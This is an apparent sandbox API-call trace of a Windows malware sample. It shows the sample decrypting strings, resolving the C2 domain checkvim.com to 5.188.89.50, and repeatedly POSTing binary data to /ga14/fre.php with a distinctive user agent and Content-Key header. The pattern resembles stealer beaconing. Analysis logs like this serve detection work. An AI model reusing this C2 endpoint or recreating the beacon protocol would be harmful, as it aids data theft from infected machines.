dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0324.948] GetProcessHeap () returned 0x840000 [0324.948] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0324.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.949] CryptImportKey (in: hProv=0x870128, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e970) returned 1 [0324.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.950] CryptSetKeyParam (hKey=0x87e970, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0324.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.951] CryptSetKeyParam (hKey=0x87e970, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.951] GetProcessHeap () returned 0x840000 [0324.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0324.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.952] CryptDecrypt (in: hKey=0x87e970, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0324.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.952] CryptDestroyKey (hKey=0x87e970) returned 1 [0324.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.953] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0324.953] GetProcessHeap () returned 0x840000 [0324.953] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0324.954] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.954] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0324.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.955] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0324.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.956] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0324.956] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.956] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0324.956] GetProcessHeap () returned 0x840000 [0324.956] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0324.957] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0324.957] GetProcessHeap () returned 0x840000 [0324.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0324.957] GetProcessHeap () returned 0x840000 [0324.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0324.957] GetProcessHeap () returned 0x840000 [0324.957] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0324.957] GetProcessHeap () returned 0x840000 [0324.957] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0324.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.958] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0324.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.962] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x870128) returned 1 [0324.967] GetProcessHeap () returned 0x840000 [0324.967] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0324.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.968] CryptImportKey (in: hProv=0x870128, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0324.968] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.969] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0324.969] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.969] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0324.969] GetProcessHeap () returned 0x840000 [0324.969] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0324.970] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.971] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0324.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.971] CryptDestroyKey (hKey=0x87e370) returned 1 [0324.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0324.972] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0324.972] GetProcessHeap () returned 0x840000 [0324.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0324.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.974] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0324.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.975] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0324.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0324.977] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0324.977] GetProcessHeap () returned 0x840000 [0324.977] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0324.977] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0324.979] GetProcessHeap () returned 0x840000 [0324.979] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871bd8 [0324.979] socket (af=2, type=1, protocol=6) returned 0x594 [0324.979] connect (s=0x594, name=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0325.047] FreeAddrInfoW (pAddrInfo=0x871268*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x8789e0*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0325.047] GetProcessHeap () returned 0x840000 [0325.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fce8 [0325.047] GetProcessHeap () returned 0x840000 [0325.047] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0325.048] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0325.048] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0325.048] GetProcessHeap () returned 0x840000 [0325.048] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0325.048] GetProcessHeap () returned 0x840000 [0325.048] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0325.049] GetProcessHeap () returned 0x840000 [0325.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fcb0 [0325.049] GetProcessHeap () returned 0x840000 [0325.049] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0325.049] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0325.050] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0325.050] GetProcessHeap () returned 0x840000 [0325.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0325.050] GetProcessHeap () returned 0x840000 [0325.050] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0325.050] send (s=0x594, buf=0x873a58*, len=237, flags=0) returned 237 [0325.050] send (s=0x594, buf=0x87eb58*, len=159, flags=0) returned 159 [0325.050] GetProcessHeap () returned 0x840000 [0325.050] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0325.050] recv (in: s=0x594, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0325.392] GetProcessHeap () returned 0x840000 [0325.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fcb0 | out: hHeap=0x840000) returned 1 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fce8 | out: hHeap=0x840000) returned 1 [0325.393] closesocket (s=0x594) returned 0 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871bd8 | out: hHeap=0x840000) returned 1 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0325.393] GetProcessHeap () returned 0x840000 [0325.393] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0325.394] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x6a4) returned 0x594 [0325.395] Sleep (dwMilliseconds=0xea60) [0325.408] GetProcessHeap () returned 0x840000 [0325.408] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f7e8 [0325.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.409] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0325.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.415] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0325.421] GetProcessHeap () returned 0x840000 [0325.421] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0325.422] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.422] CryptImportKey (in: hProv=0x86ff90, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0325.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.423] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0325.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.424] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.424] GetProcessHeap () returned 0x840000 [0325.424] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0325.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.425] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f7e8, pdwDataLen=0x19f9a4 | out: pbData=0x87f7e8, pdwDataLen=0x19f9a4) returned 1 [0325.426] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.426] CryptDestroyKey (hKey=0x87e270) returned 1 [0325.427] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.427] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0325.427] GetProcessHeap () returned 0x840000 [0325.427] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0325.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.428] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0325.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.429] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0325.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0325.430] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.430] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0325.431] GetProcessHeap () returned 0x840000 [0325.431] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0325.431] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0325.431] GetProcessHeap () returned 0x840000 [0325.431] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0325.431] GetProcessHeap () returned 0x840000 [0325.431] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0325.431] GetProcessHeap () returned 0x840000 [0325.431] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f7e8 | out: hHeap=0x840000) returned 1 [0325.431] GetProcessHeap () returned 0x840000 [0325.431] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0325.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.432] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0325.436] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.436] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0325.442] GetProcessHeap () returned 0x840000 [0325.442] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708d8 [0325.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.442] CryptImportKey (in: hProv=0x86f688, pbData=0x8708d8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e670) returned 1 [0325.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.443] CryptSetKeyParam (hKey=0x87e670, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0325.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.444] CryptSetKeyParam (hKey=0x87e670, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.444] GetProcessHeap () returned 0x840000 [0325.444] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708d8 | out: hHeap=0x840000) returned 1 [0325.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.445] CryptDecrypt (in: hKey=0x87e670, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0325.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.445] CryptDestroyKey (hKey=0x87e670) returned 1 [0325.446] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.446] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0325.446] GetProcessHeap () returned 0x840000 [0325.446] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0325.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.447] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0325.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.448] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0325.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.449] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0325.449] GetProcessHeap () returned 0x840000 [0325.449] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0325.449] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0325.450] GetProcessHeap () returned 0x840000 [0325.450] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0325.450] socket (af=2, type=1, protocol=6) returned 0x598 [0325.450] connect (s=0x598, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0325.545] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0325.545] GetProcessHeap () returned 0x840000 [0325.545] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0325.545] GetProcessHeap () returned 0x840000 [0325.545] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0325.546] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0325.547] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0325.547] GetProcessHeap () returned 0x840000 [0325.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0325.547] GetProcessHeap () returned 0x840000 [0325.547] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0325.547] GetProcessHeap () returned 0x840000 [0325.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f908 [0325.547] GetProcessHeap () returned 0x840000 [0325.547] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0325.548] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0325.548] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0325.548] GetProcessHeap () returned 0x840000 [0325.548] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0325.548] GetProcessHeap () returned 0x840000 [0325.548] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0325.549] send (s=0x598, buf=0x873a58*, len=237, flags=0) returned 237 [0325.549] send (s=0x598, buf=0x87eb58*, len=159, flags=0) returned 159 [0325.549] GetProcessHeap () returned 0x840000 [0325.549] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0325.549] recv (in: s=0x598, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0325.908] GetProcessHeap () returned 0x840000 [0325.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0325.908] GetProcessHeap () returned 0x840000 [0325.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0325.908] GetProcessHeap () returned 0x840000 [0325.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0325.908] GetProcessHeap () returned 0x840000 [0325.908] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0325.908] closesocket (s=0x598) returned 0 [0325.909] GetProcessHeap () returned 0x840000 [0325.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0325.909] GetProcessHeap () returned 0x840000 [0325.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0325.909] GetProcessHeap () returned 0x840000 [0325.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0325.909] GetProcessHeap () returned 0x840000 [0325.909] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0325.909] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x990) returned 0x598 [0325.910] Sleep (dwMilliseconds=0xea60) [0325.934] GetProcessHeap () returned 0x840000 [0325.934] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0325.934] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.935] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0325.941] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.941] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0325.948] GetProcessHeap () returned 0x840000 [0325.948] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0325.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.949] CryptImportKey (in: hProv=0x86f8a8, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0325.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.950] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0325.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.951] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0325.951] GetProcessHeap () returned 0x840000 [0325.951] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0325.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.952] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0325.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.953] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0325.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0325.954] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0325.954] GetProcessHeap () returned 0x840000 [0325.954] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0325.955] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0325.955] StrStrA 